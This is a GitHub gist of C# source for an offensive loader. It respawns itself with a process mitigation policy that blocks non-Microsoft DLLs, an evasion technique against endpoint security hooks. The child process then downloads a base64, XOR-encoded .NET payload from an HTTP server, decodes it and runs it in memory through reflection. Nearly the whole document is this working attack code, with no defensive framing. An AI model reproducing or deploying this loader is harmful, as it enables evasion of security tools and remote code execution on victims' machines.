Skip to content

Instantly share code, notes, and snippets.

@mvelazc0
Last active October 12, 2020 23:45
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mvelazc0/d7ad7c46f42019222647f2516a1923fb to your computer and use it in GitHub Desktop.
Save mvelazc0/d7ad7c46f42019222647f2516a1923fb to your computer and use it in GitHub Desktop.
Uses the Blockdlls technique to execute https://gist.github.com/mvelazc0/4a56e1829ef3bd2784b6f06e35cb0ff2 as a child process.
using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace GetAndRunBlockDlls
{
class Program
{
static void Main(string[] args)
{
if (args.Length == 0)
{
var startInfoEx = new Win32API.STARTUPINFOEX();
var processInfo = new Win32API.PROCESS_INFORMATION();
startInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(startInfoEx);
var lpValue = Marshal.AllocHGlobal(IntPtr.Size);
var processSecurity = new Win32API.SECURITY_ATTRIBUTES();
var threadSecurity = new Win32API.SECURITY_ATTRIBUTES();
processSecurity.nLength = Marshal.SizeOf(processSecurity);
threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
var lpSize = IntPtr.Zero;
Win32API.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
startInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
Win32API.InitializeProcThreadAttributeList(startInfoEx.lpAttributeList, 2, 0, ref lpSize);
Marshal.WriteIntPtr(lpValue, new IntPtr((long)Win32API.BinarySignaturePolicy.BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE));
Win32API.UpdateProcThreadAttribute(
startInfoEx.lpAttributeList,
0,
(IntPtr)Win32API.ProcThreadAttribute.MITIGATION_POLICY,
lpValue,
(IntPtr)IntPtr.Size,
IntPtr.Zero,
IntPtr.Zero
);
Win32API.CreateProcess(
System.Reflection.Assembly.GetEntryAssembly().Location,
System.Reflection.Assembly.GetEntryAssembly().Location + " /v",
ref processSecurity,
ref threadSecurity,
false,
//Win32API.CreationFlags.ExtendedStartupInfoPresent | Win32API.CreationFlags.CreateSuspended,
Win32API.CreationFlags.ExtendedStartupInfoPresent,
IntPtr.Zero,
null,
ref startInfoEx,
out processInfo
);
}
else if (args.Length == 1)
{
string server = "http://192.168.0.91:8000/payload";
string key = "A";
WebClient client = new WebClient();
Stream stream = client.OpenRead(server);
StreamReader reader = new StreamReader(stream);
byte[] code = Convert.FromBase64String(reader.ReadToEnd());
byte[] assemblyBytes = xor(code, Encoding.ASCII.GetBytes(key));
Assembly assembly = Assembly.Load(assemblyBytes);
Type type = assembly.GetType("Namespace.Class");
object obj = Activator.CreateInstance(type);
type.InvokeMember("Run",
BindingFlags.Default | BindingFlags.InvokeMethod,
null,
obj,
new object[] { });
}
}
private static byte[] xor(byte[] cipher, byte[] key)
{
byte[] xored = new byte[cipher.Length];
for (int i = 0; i < cipher.Length; i++)
{
xored[i] = (byte)(cipher[i] ^ key[i % key.Length]);
}
return xored;
}
}
class Win32API
{
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);
[DllImport("kernel32.dll")]
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFO
{
public uint cb;
public IntPtr lpReserved;
public IntPtr lpDesktop;
public IntPtr lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttributes;
public uint dwFlags;
public ushort wShowWindow;
public ushort cbReserved;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdErr;
}
[StructLayout(LayoutKind.Sequential)]
public struct STARTUPINFOEX
{
public STARTUPINFO StartupInfo;
public IntPtr lpAttributeList;
}
[StructLayout(LayoutKind.Sequential)]
public struct SECURITY_ATTRIBUTES
{
public int nLength;
public IntPtr lpSecurityDescriptor;
public int bInheritHandle;
}
[Flags]
public enum ProcThreadAttribute : int
{
MITIGATION_POLICY = 0x20007,
PARENT_PROCESS = 0x00020000
}
[Flags]
public enum BinarySignaturePolicy : ulong
{
BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000,
BLOCK_NON_MICROSOFT_BINARIES_ALLOW_STORE = 0x300000000000
}
[Flags]
public enum CreationFlags : uint
{
CreateSuspended = 0x00000004,
DetachedProcess = 0x00000008,
CreateNoWindow = 0x08000000,
ExtendedStartupInfoPresent = 0x00080000
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment